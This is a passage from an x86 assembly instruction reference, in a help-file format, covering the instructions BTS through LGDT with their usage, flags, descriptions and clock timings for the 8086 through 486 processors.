6 6 4-8 + mem16,immed8 - - 8 8 4-8 + reg16,reg16 - - 6 6 3-7 + mem16,reg16 - - 13 13 3-7 + + + - see ~Instruction Timing~ + +:bts +^BTS - Bit Test and Set (386+ only) + + + Usage: BTS dest,src + Modifies flags: CF + + + The destination bit indexed by the source value is copied into the + Carry Flag and then set in the destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,immed8 - - 6 6 4-8 + mem16,immed8 - - 8 8 4-8 + reg16,reg16 - - 6 6 3-7 + mem16,reg16 - - 13 13 3-7 + + + - see ~Instruction Timing~ + +:call +^CALL - Procedure Call + + Usage: CALL destination + Modifies flags: None + + Pushes Instruction Pointer (and Code Segment for far calls) onto + stack and loads Instruction Pointer with the address of proc-name. + Code continues with execution at CS:IP. + +% Clocks +% Operands 808x 286 386 486 + + rel16 (near, IP relative) 19 7 7+m 3 + rel32 (near, IP relative) - - 7+m 3 + + reg16 (near, register indirect) 16 7 7+m 5 + reg32 (near, register indirect) - - 7+m 5 + + mem16 (near, memory indirect) - 21+EA 11 10+m 5 + mem32 (near, memory indirect) - - 10+m 5 + + ptr16:16 (far, full ptr supplied) 28 13 17+m 18 + ptr16:32 (far, full ptr supplied) - - 17+m 18 + ptr16:16 (far, ptr supplied, prot. mode) - 26 34+m 20 + ptr16:32 (far, ptr supplied, prot. mode) - - 34+m 20 + m16:16 (far, indirect) 37+EA 16 22+m 17 + m16:32 (far, indirect) - - 22+m 17 + m16:16 (far, indirect, prot. mode) - 29 38+m 20 + m16:32 (far, indirect, prot. mode) - - 38+m 20 + + ptr16:16 (task, via TSS or task gate) - 177 TS 37+TS + m16:16 (task, via TSS or task gate) - 180/185 5+TS 37+TS + m16:32 (task) - - TS 37+TS + m16:32 (task) - - 5+TS 37+TS + + ptr16:16 (gate, same privilege) - 41 52+m 35 + ptr16:32 (gate, same privilege) - - 52+m 35 + m16:16 (gate, same privilege) - 44 56+m 35 + m16:32 (gate, same privilege) - - 56+m 35 + + ptr16:16 (gate, more priv, no parm) - 82 86+m 69 + ptr16:32 (gate, more priv, no parm) - - 86+m 69 + m16:16 (gate, more priv, no parm) - 83 90+m 69 + m16:32 (gate, more priv, no parm) - - 90+m 69 + + ptr16:16 (gate, more priv, x parms) - 86+4x 94+4x+m 77+4x + ptr16:32 (gate, more priv, x parms) - - 94+4x+m 77+4x + m16:16 (gate, more priv, x parms) - 90+4x 98+4x+m 77+4x + m16:32 (gate, more priv, x parms) - - 98+4x+m 77+4x + + + - see ~Instruction Timing~ + +:cbw +^CBW - Convert Byte to Word + + + Usage: CBW + Modifies flags: None + + + Converts byte in AL to word Value in AX by extending sign of AL + throughout register AH. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 3 3 1 + + + - see ~Instruction Timing~ + +:cdq +^CDQ - Convert Double to Quad (386+ only) + + + Usage: CDQ + Modifies flags: None + + + Converts signed DWORD in EAX to a signed quad word in EDX:EAX by + extending the high order bit of EAX throughout EDX + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - - 2 3 1 + + + - see ~Instruction Timing~ + +:clc +^CLC - Clear Carry + + + Usage: CLC + Modifies flags: CF + + + Clears the Carry Flag. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 2 1 + + + - see ~Instruction Timing~ + +:cld +^CLD - Clear Direction Flag + + + Usage: CLD + Modifies flags: DF + + + Clears the Direction Flag causing string instructions to increment + the SI and DI index registers. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 2 1 + + + - see ~Instruction Timing~ + +:cli +^CLI - Clear Interrupt Flag (disable) + + + Usage: CLI + Modifies flags: IF + + + Disables the maskable hardware interrupts by clearing the Interrupt + flag. NMI's and software interrupts are not inhibited. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 3 5 1 + + + - see ~Instruction Timing~ + +:clts +^CLTS - Clear Task Switched Flag (286+ privileged) + + + Usage: CLTS + Modifies flags: None + + + Clears the Task Switched Flag in the Machine Status Register. This + is a privileged operation and is generally used only by operating + system code. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - 2 5 7 2 + + + - see ~Instruction Timing~ + +:cmc +^CMC - Complement Carry Flag + + + Usage: CMC + Modifies flags: CF + + + Toggles (inverts) the Carry Flag + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 2 1 + + + - see ~Instruction Timing~ + +:cmp +^CMP - Compare + + Usage: CMP dest,src + Modifies flags: AF CF OF PF SF ZF + + + Subtracts source from destination and updates the flags but does + not save result. Flags can subsequently be checked for conditions. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 9+EA 7 5 2 2-4 (W88=13+EA) + reg,mem 9+EA 6 6 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 10+EA 6 5 2 3-6 (W88=14+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:cmps:cmpsb:cmpsw:cmpsd +^CMPS - Compare String (Byte, Word or Doubleword) + + Usage: CMPS dest,src + CMPSB + CMPSW + CMPSD (386+ only) + Modifies flags: AF CF OF PF SF ZF + + Subtracts destination value from source without saving results. + Updates flags based on the subtraction and the index registers + (E)SI and (E)DI are incremented or decremented depending on the + state of the Direction Flag. CMPSB inc/decrements the index + registers by 1, CMPSW inc/decrements by 2, while CMPSD increments + or decrements by 4. The REP prefixes can be used to process + entire data items. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + dest,src 22 8 10 8 1 (W88=30) + + + - see ~Instruction Timing~ + +:cmpxchg +^CMPXCHG - Compare and Exchange + + Usage: CMPXCHG dest,src (486+) + Modifies flags: AF CF OF PF SF ZF + + + Compares the accumulator (8-32 bits) with "dest". If equal the + "dest" is loaded with "src", otherwise the accumulator is loaded + with "dest". + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg - - - 6 2 + mem,reg - - - 7 2 + + + - add 3 clocks if the "mem,reg" comparison fails + - see ~Instruction Timing~ + +:cwd +^CWD - Convert Word to Doubleword + + + Usage: CWD + Modifies flags: None + + + Extends sign of word in register AX throughout register DX forming + a doubleword quantity in DX:AX. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 5 2 2 3 1 + + + - see ~Instruction Timing~ + +:cwde +^CWDE - Convert Word to Extended Doubleword (386+ only) + + + Usage: CWDE + Modifies flags: None + + + Converts a signed word in AX to a signed doubleword in EAX by + extending the sign bit of AX throughout EAX. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - - 3 3 1 + + + - see ~Instruction Timing~ + +:daa +^DAA - Decimal Adjust for Addition + + + Usage: DAA + Modifies flags: AF CF PF SF ZF (OF undefined) + + + Corrects result (in AL) of a previous BCD addition operation. + Contents of AL are changed to a pair of packed decimal digits. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 4 3 4 2 1 + + + - see ~Instruction Timing~ + +:das +^DAS - Decimal Adjust for Subtraction + + + Usage: DAS + Modifies flags: AF CF PF SF ZF (OF undefined) + + + Corrects result (in AL) of a previous BCD subtraction operation. + Contents of AL are changed to a pair of packed decimal digits. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 4 3 4 2 1 + + + - see ~Instruction Timing~ + +:dec +^DEC - Decrement + + + Usage: DEC dest + Modifies flags: AF OF PF SF ZF + + + Unsigned binary subtraction of one from the destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 3 2 2 1 2 + mem 15+EA 7 6 3 2-4 + reg16/32 3 2 2 1 1 + + + - see ~Instruction Timing~ + +:div +^DIV - Divide + + Usage: DIV src + Modifies flags: (AF,CF,OF,PF,SF,ZF undefined) + + Unsigned binary division of accumulator by source. If the source + divisor is a byte value then AX is divided by "src" and the quotient + is placed in AL and the remainder in AH. If source operand is a word + value, then DX:AX is divided by "src" and the quotient is stored in AX + and the remainder in DX. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 80-90 14 14 16 2 + reg16 144-162 22 22 24 2 + reg32 - - 38 40 2 + mem8 (86-96)+EA 17 17 16 2-4 + mem16 (150-168)+EA 25 25 24 2-4 (W88=158-176+EA) + mem32 - - 41 40 2-4 + + + - see ~Instruction Timing~ + +:enter +^ENTER - Make Stack Frame (80188+) + + + Usage: ENTER locals,level + Modifies flags: None + + + Modifies stack for entry to procedure for high level language. + Operand "locals" specifies the amount of storage to be allocated + on the stack. "Level" specifies the nesting level of the routine. + Paired with the ~LEAVE~ instruction, this is an efficient method of + entry and exit to procedures. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + immed16,0 - 11 10 14 4 + immed16,1 - 15 12 17 4 + immed16,immed8 - 12+4(n-1) 15+4(n-1) 17+3n 4 + + + - see ~Instruction Timing~ + +:esc +^ESC - Escape + + + Usage: ESC immed,src + Modifies flags: None + + + Provides access to the data bus for other resident processors. + The CPU treats it as a ~NOP~ but places memory operand on bus. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + immed,reg 2 9-20 ? 2 + immed,mem 2 9-20 ? 2-4 + + + - see ~Instruction Timing~ + +:hlt +^HLT - Halt CPU + + + Usage: HLT + Modifies flags: None + + + Halts CPU until RESET line is activated, NMI or maskable interrupt + received. The CPU becomes dormant but retains the current CS:IP + for later restart. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 5 4 1 + + + - see ~Instruction Timing~ + +:idiv +^IDIV - Signed Integer Division + + Usage: IDIV src + Modifies flags: (AF,CF,OF,PF,SF,ZF undefined) + + Signed binary division of accumulator by source. If source is a + byte value, AX is divided by "src" and the quotient is stored in + AL and the remainder in AH. If source is a word value, DX:AX is + divided by "src", and the quotient is stored in AL and the + remainder in DX. +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 101-112 17 19 19 2 + reg16 165-184 25 27 27 2 + reg32 - - 43 43 2 + mem8 (107-118)+EA 20 22 20 2-4 + mem16 (171-190)+EA 38 30 28 2-4 (W88=175-194) + mem32 - - 46 44 2-4 + + + - see ~Instruction Timing~ + +:imul +^IMUL - Signed Multiply + + Usage: IMUL src + IMUL src,immed (286+ only) + IMUL dest,src,immed8 (286+ only) + IMUL dest,src (386+ only) + Modifies flags: CF OF (AF,PF,SF,ZF undefined) + + + Signed multiplication of accumulator by "src" with result placed + in the accumulator. If the source operand is a byte value, it + is multiplied by AL and the result stored in AX. If the source + operand is a word value it is multiplied by AX and the result is + stored in DX:AX. Other variations of this instruction allow + specification of source and destination registers as well as a + third immediate factor. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 80-98 13 9-14 13-18 2 + reg16 128-154 21 9-22 13-26 2 + reg32 - - 9-38 12-42 2 + mem8 86-104 16 12-17 13-18 2-4 + mem16 134-160 24 12-25 13-26 2-4 + mem32 - - 12-41 13-42 2-4 + reg16,reg16 - - 9-22 13-26 3-5 + reg32,reg32 - - 9-38 13-42 3-5 + reg16,mem16 - - 12-25 13-26 3-5 + reg32,mem32 - - 12-41 13-42 3-5 + reg16,immed - 21 9-22 13-26 3 + reg32,immed - 21 9-38 13-42 3-6 + reg16,reg16,immed - 2 9-22 13-26 3-6 + reg32,reg32,immed - 21 9-38 13-42 3-6 + reg16,mem16,immed - 24 12-25 13-26 3-6 + reg32,mem32,immed - 24 12-41 13-42 3-6 + + + - see ~Instruction Timing~ + +:in +^IN - Input Byte or Word From Port + + + Usage: IN accum,port + Modifies flags: None + + + A byte, word or dword is read from "port" and placed in AL, AX or + EAX respectively. If the port number is in the range of 0-255 + it can be specified as an immediate, otherwise the port number + must be specified in DX. Valid port ranges on the PC are 0-1024, + though values through 65535 may be specified and recognized by + third party vendors and PS/2's. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + accum,immed8 10/14 5 12 14 2 + accum,immed8 (PM) 6/26 8/28/27 2 + accum,DX 8/12 5 13 14 1 + accum,DX (PM) 7/27 8/28/27 1 + + + - 386+ protected mode timings depend on privilege levels. + + first number is the timing if: CPL ó IOPL + second number is the timing if: CPL > IOPL or in VM 86 mode (386) + CPL ò IOPL (486) + third number is the timing when: virtual mode on 486 processor + - 486 virtual mode always requires 27 cycles + + - see ~Instruction Timing~ + +:inc +^INC - Increment + + + Usage: INC dest + Modifies flags: AF OF PF SF ZF + + + Adds one to destination unsigned binary operand. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 3 2 2 1 2 + reg16 3 2 2 1 1 + reg32 3 2 2 1 1 + mem 15+EA 7 6 3 2-4 (W88=23+EA) + + + - see ~Instruction Timing~ + +:ins:insb:insw:insd +^INS - Input String from Port (80188+) + + + Usage: INS dest,port + INSB + INSW + INSD (386+ only) + Modifies flags: None + + Loads data from port to the destination ES:(E)DI (even if a + destination operand is supplied). (E)DI is adjusted by the size + of the operand and increased if the Direction Flag is cleared and + decreased if the Direction Flag is set. For INSB, INSW, INSD no + operands are allowed and the size is determined by the mnemonic. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + dest,port - 5 15 17 1 + dest,port (PM) - 5 9/29 10/32/30 1 + none - 5 15 17 1 + none (PM) - 5 9/29 10/32/30 1 + + + - 386+ protected mode timings depend on privilege levels. + + first number is the timing if: CPL ó IOPL + second number is the timing if: CPL > IOPL + third number is the timing if: virtual mode on 486 processor + + - see ~Instruction Timing~ + +:int +^INT - Interrupt + + + Usage: INT num + Modifies flags: TF IF + + Initiates a software interrupt by pushing the flags, clearing the + Trap and Interrupt Flags, pushing CS followed by IP and loading + CS:IP with the value found in the interrupt vector table. Execution + then begins at the location addressed by the new CS:IP + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + 3 (constant) 52/72 23+m 33 26 2 + 3 (prot. mode, same priv.) - 40+m 59 44 2 + 3 (prot. mode, more priv.) - 78+m 99 71 2 + 3 (from VM86 to PL 0) - - 119 82 2 + 3 (prot. mode via task gate) - 167+m TS 37+TS 2 + immed8 51/71 23+m 37 30 1 + immed8 (prot. mode, same priv.) - 40+m 59 44 1 + immed8 (prot. mode, more priv.) - 78+m 99 71 1 + immed8 (from VM86 to PL 0) - - 119 86 1 + immed8 (prot. mode, via task gate) - 167+m TS 37+TS 1 + + + - see ~Instruction Timing~ + +:into +^INTO - Interrupt on Overflow + + + Usage: INTO + Modifies flags: IF TF + + + If the Overflow Flag is set this instruction generates an INT 4 + which causes the code addressed by 0000:0010 to be executed. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none: jump 53/73 24+m 35 28 1 + no jump 4 3 3 3 + (prot. mode, same priv.) - - 59 46 1 + (prot. mode, more priv.) - - 99 73 1 + (from VM86 to PL 0) - - 119 84 1 + (prot. mode, via task gate) - TS 39+TS 1 + + + - see ~Instruction Timing~ + +:invd +^INVD - Invalidate Cache (486+ only) + + + Usage: INVD + Modifies flags: none + + + Flushes CPU internal cache. Issues special function bus cycle + which indicates to flush external caches. Data in write-back + external caches is lost. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - - - 4 2 + + + - see ~Instruction Timing~ + +:invlpg +^INVLPG - Invalidate Translation Look-Aside Buffer Entry (486+ only) + + + Usage: INVLPG + Modifies flags: none + + + Invalidates a single page table entry in the Translation + Look-Aside Buffer. Intel warns that this instruction may be + implemented differently on future processors. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - - - 12 2 + + + - timing is for TLB entry hit only. + - see ~Instruction Timing~ + +:iret:iretd +^IRET/IRETD - Interrupt Return + + Usage: IRET + IRETD (386+ only) + Modifies flags: AF CF DF IF PF SF TF ZF + + Returns control to point of interruption by popping IP, CS + and then the Flags from the stack and continues execution at + this location. CPU exception interrupts will return to the + instruction that cause the exception because the CS:IP placed + on the stack during the interrupt is the address of the offending + instruction. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + iret 32/44 17+m 22 15 1 + iret (prot. mode) - 31+m 38 15 1 + iret (to less privilege) - 55+m 82 36 1 + iret (different task, NT=1) - 169+m TS TS+32 1 + iretd - - 22/38 15 1 + iretd (to less privilege) - - 82 36 1 + iretd (to VM86 mode) - - 60 15 1 + iretd (different task, NT=1) - - TS TS+32 1 + + + - 386 timings are listed as real-mode/protected-mode + - see ~Instruction Timing~ + +:j... +^Jump Instructions Table + +% Mnemonic Meaning Jump Condition + + ~JA~ Jump if Above CF=0 and ZF=0 + ~JAE~ Jump if Above or Equal CF=0 + ~JB~ Jump if Below CF=1 + ~JBE~ Jump if Below or Equal CF=1 or ZF=1 + ~JC~ Jump if Carry CF=1 + ~JCXZ~ Jump if CX Zero CX=0 + ~JE~ Jump if Equal ZF=1 + ~JG~ Jump if Greater (signed) ZF=0 and SF=OF + ~JGE~ Jump if Greater or Equal (signed) SF=OF + ~JL~ Jump if Less (signed) SF != OF + ~JLE~ Jump if Less or Equal (signed) ZF=1 or SF != OF + ~JMP~ Unconditional Jump unconditional + ~JNA~ Jump if Not Above CF=1 or ZF=1 + ~JNAE~ Jump if Not Above or Equal CF=1 + ~JNB~ Jump if Not Below CF=0 + ~JNBE~ Jump if Not Below or Equal CF=0 and ZF=0 + ~JNC~ Jump if Not Carry CF=0 + ~JNE~ Jump if Not Equal ZF=0 + ~JNG~ Jump if Not Greater (signed) ZF=1 or SF != OF + ~JNGE~ Jump if Not Greater or Equal (signed) SF != OF + ~JNL~ Jump if Not Less (signed) SF=OF + ~JNLE~ Jump if Not Less or Equal (signed) ZF=0 and SF=OF + ~JNO~ Jump if Not Overflow (signed) OF=0 + ~JNP~ Jump if No Parity PF=0 + ~JNS~ Jump if Not Signed (signed) SF=0 + ~JNZ~ Jump if Not Zero ZF=0 + ~JO~ Jump if Overflow (signed) OF=1 + ~JP~ Jump if Parity PF=1 + ~JPE~ Jump if Parity Even PF=1 + ~JPO~ Jump if Parity Odd PF=0 + ~JS~ Jump if Signed (signed) SF=1 + ~JZ~ Jump if Zero ZF=1 + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + Jx: jump 16 7+m 7+m 3 2 + no jump 4 3 3 1 + Jx near-label - - 7+m 3 4 + no jump - - 3 1 + + + - It's a good programming practice to organize code so the + expected case is executed without a jump since the actual + jump takes longer to execute than falling through the test. + - see ~JCXZ~ and ~JMP~ for their respective timings + - see ~Instruction Timing~ ~FLAGS~ + +:ja:jnbe +^JA/JNBE - Jump Above / Jump Not Below or Equal + + + Usage: JA label + JNBE label + Modifies flags: None + + + Causes execution to branch to "label" if the Carry Flag and Zero Flag + are both clear. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jae:jnb +^JAE/JNB - Jump Above or Equal / Jump on Not Below + + + Usage: JAE label + JNB label + Modifies flags: None + + + Causes execution to branch to "label" if the Carry Flag is clear. + Functionally similar to ~JNC~. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jb:jnae +^JB/JNAE - Jump Below / Jump Not Above or Equal + + + Usage: JB label + JNAE label + Modifies flags: None + + + Causes execution to branch to "label" if the Carry Flag is set. + Functionally similar to ~JC~. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jbe:jna +^JBE/JNA - Jump Below or Equal / Jump Not Above + + + Usage: JBE label + JNA label + Modifies flags: None + + + Causes execution to branch to "label" if the Carry Flag or + the Zero Flag is set. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jc +^JC - Jump on Carry + + + Usage: JC label + Modifies flags: None + + + Causes execution to branch to "label" if the Carry Flag is set. + Functionally similar to ~JB~ and ~JNAE~. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jcxz:jecxz +^JCXZ/JECXZ - Jump if Register (E)CX is Zero + + + Usage: JCXZ label + JECXZ label (386+ only) + Modifies flags: None + + + Causes execution to branch to "label" if register CX is zero. Uses + unsigned comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 18 8+m 9+m 8 2 + no jump 6 4 5 5 + + + - see ~Instruction Timing~ + +:je:jz +^JE/JZ - Jump Equal / Jump Zero + + + Usage: JE label + JZ label + Modifies flags: None + + + Causes execution to branch to "label" if the Zero Flag is set. Uses + unsigned comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jg:jnle +^JG/JNLE - Jump Greater / Jump Not Less or Equal + + + Usage: JG label + JNLE label + Modifies flags: None + + + Causes execution to branch to "label" if the Zero Flag is clear or + the Sign Flag equals the Overflow Flag. Signed comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jge:jnl +^JGE/JNL - Jump Greater or Equal / Jump Not Less + + + Usage: JGE label + JNL label + Modifies flags: None + + + Causes execution to branch to "label" if the Sign Flag equals + the Overflow Flag. Signed comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jl:jnge +^JL/JNGE - Jump Less / Jump Not Greater or Equal + + + Usage: JL label + JNGE label + Modifies flags: None + + + Causes execution to branch to "label" if the Sign Flag is not equal + to Overflow Flag. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jle:jng +^JLE/JNG - Jump Less or Equal / Jump Not Greater + + + Usage: JLE label + JNG label + Modifies flags: None + + + Causes execution to branch to "label" if the Zero Flag is set or the + Sign Flag is not equal to the Overflow Flag. Signed comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jmp +^JMP - Unconditional Jump + + Usage: JMP target + Modifies flags: None + + Unconditionally transfers control to "label". Jumps by default + are within -32768 to 32767 bytes from the instruction following + the jump. NEAR and SHORT jumps cause the IP to be updated while FAR + jumps cause CS and IP to be updated. + +% Clocks +% Operands 808x 286 386 486 + + rel8 (relative) 15 7+m 7+m 3 + rel16 (relative) 15 7+m 7+m 3 + rel32 (relative) - - 7+m 3 + reg16 (near, register indirect) 11 7+m 7+m 5 + reg32 (near, register indirect) - - 7+m 5 + mem16 (near, mem indirect) 18+EA 11+m 10+m 5 + mem32 (near, mem indirect) 24+EA 15+m 10+m 5 + ptr16:16 (far, dword immed) - - 12+m 17 + ptr16:16 (far, PM dword immed) - - 27+m 19 + ptr16:16 (call gate, same priv.) - 38+m 45+m 32 + ptr16:16 (via TSS) - 175+m TS 42+TS + ptr16:16 (via task gate) - 180+m TS 43+TS + mem16:16 (far, indirect) - - 43+m 13 + mem16:16 (far, PM indirect) - - 31+m 18 + mem16:16 (call gate, same priv.) - 41+m 49+m 31 + mem16:16 (via TSS) - 178+m 5+TS 41+TS + mem16:16 (via task gate) - 183+m 5+TS 42+TS + ptr16:32 (far, 6 byte immed) - - 12+m 13 + ptr16:32 (far, PM 6 byte immed) - - 27+m 18 + ptr16:32 (call gate, same priv.) - - 45+m 31 + ptr16:32 (via TSS) - - TS 42+TS + ptr16:32 (via task state) - - TS 43+TS + m16:32 (far, address at dword) - - 43+m 13 + m16:32 (far, address at dword) - - 31+m 18 + m16:32 (call gate, same priv.) - - 49+m 31 + m16:32 (via TSS) - - 5+TS 41+TS + m16:32 (via task state) - - 5+TS 42+TS + + - see ~Instruction Timing~ + +:jnc +^JNC - Jump Not Carry + + + Usage: JNC label + Modifies flags: None + + + Causes execution to branch to "label" if the Carry Flag is clear. + Functionally similar to ~JAE~ or ~JNB~. Unsigned comparision. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jne:jnz +^JNE/JNZ - Jump Not Equal / Jump Not Zero + + + Usage: JNE label + JNZ label + Modifies flags: None + + + Causes execution to branch to "label" if the Zero Flag is clear. + Unsigned comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jno +^JNO - Jump Not Overflow + + + Usage: JNO label + Modifies flags: None + + + Causes execution to branch to "label" if the Overflow Flag is clear. + Signed comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jns +^JNS - Jump Not Signed + + + Usage: JNS label + Modifies flags: None + + + Causes execution to branch to "label" if the Sign Flag is clear. + Signed comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jnp:jpo +^JNP/JPO - Jump Not Parity / Jump Parity Odd + + + Usage: JNP label + JPO label + Modifies flags: None + + + Causes execution to branch to "label" if the Parity Flag is clear. + Unsigned comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jo +^JO - Jump on Overflow + + + Usage: JO label + Modifies flags: None + + + Causes execution to branch to "label" if the Overflow Flag is set. + Signed comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:jp:jpe +^JP/JPE - Jump on Parity / Jump on Parity Even + + + Usage: JP label + JPE label + Modifies flags: None + + + Causes execution to branch to "label" if the Parity Flag is set. + Unsigned comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:js +^JS - Jump Signed + + + Usage: JS label + Modifies flags: None + + + Causes execution to branch to "label" if the Sign Flag is set. + Signed comparision. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 16 7+m 7+m 3 2-4 + no jump 4 3 3 1 + + + - see ~Instruction Timing~ + +:lahf +^LAHF - Load Register AH From Flags + + + Usage: LAHF + Modifies flags: None + + Copies bits 0-7 of the flags register into AH. This includes flags + AF, CF, PF, SF and ZF other bits are undefined. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 4 2 2 3 1 + + + - see ~Instruction Timing~ + +:lar +^LAR - Load Access Rights (286+ protected) + + + Usage: LAR dest,src + Modifies flags: ZF + + + The high byte of the of the destination register is overwritten by + the value of the access rights byte and the low order byte is zeroed + depending on the selection in the source operand. The Zero Flag is + set if the load operation is successful. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,reg16 - 14 15 11 3 + reg32,reg32 - - 15 11 3 + reg16,mem16 - 16 16 11 3-7 + reg32,mem32 - - 16 11 3-7 + + + - see ~Instruction Timing~ + +:lds +^LDS - Load Pointer Using DS + + Usage: LDS dest,src + Modifies flags: None + + + Loads 32-bit pointer from memory source to destination register + and DS. The offset is placed in the destination register and the + segment is placed in DS. To use this instruction the word at the + lower memory address must contain the offset and the word at the + higher address must contain the segment. This simplifies the loading + of far pointers from the stack and the interrupt vector table. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,mem32 16+EA 7 7 6 2-4 + reg,mem (PM) - - 22 12 5-7 + + + - see ~Instruction Timing~ + +:lea +^LEA - Load Effective Address + + + Usage: LEA dest,src + Modifies flags: None + + + Transfers offset address of "src" to the destination register. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,mem 2+EA 3 2 1 2-4 + + + - see ~Instruction Timing~ + +:leave +^LEAVE - Restore Stack for Procedure Exit (80188+) + + + Usage: LEAVE + Modifies flags: None + + + Releases the local variables created by the previous ~ENTER~ + instruction by restoring SP and BP to their condition before + the procedure stack frame was initialized. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - 5 4 5 1 + + + - see ~Instruction Timing~ + +:les +^LES - Load Pointer Using ES + + Usage: LES dest,src + Modifies flags: None + + + Loads 32-bit pointer from memory source to destination register + and ES. The offset is placed in the destination register and the + segment is placed in ES. To use this instruction the word at the + lower memory address must contain the offset and the word at the + higher address must contain the segment. This simplifies the loading + of far pointers from the stack and the interrupt vector table. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,mem 16+EA 7 7 6 2-4 (W88=24+EA) + reg,mem (PM) - - 22 12 5-7 + + + - see ~Instruction Timing~ + +:lfs +^LFS - Load Pointer Using FS (386+ only) + + + Usage: LFS dest,src + Modifies flags: None + + + Loads 32-bit pointer from memory source to destination register + and FS. The offset is placed in the destination register and the + segment is placed in FS. To use this instruction the word at the + lower memory address must contain the offset and the word at the + higher address must contain the segment. This simplifies the loading + of far pointers from the stack and the interrupt vector table. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,mem - - 7 6 5-7 + reg,mem (PM) - - 22 12 5-7 + + + - see ~Instruction Timing~ + +:lgdt +^LGDT - Load Global Descriptor Table (286+ privileged) + + + Usage: LGDT src + Modifies flags: None + + + Loads a value from an operand into the Global Descriptor Table + (~GDT~) register. + + +% Clocks Size +% Operands 808x 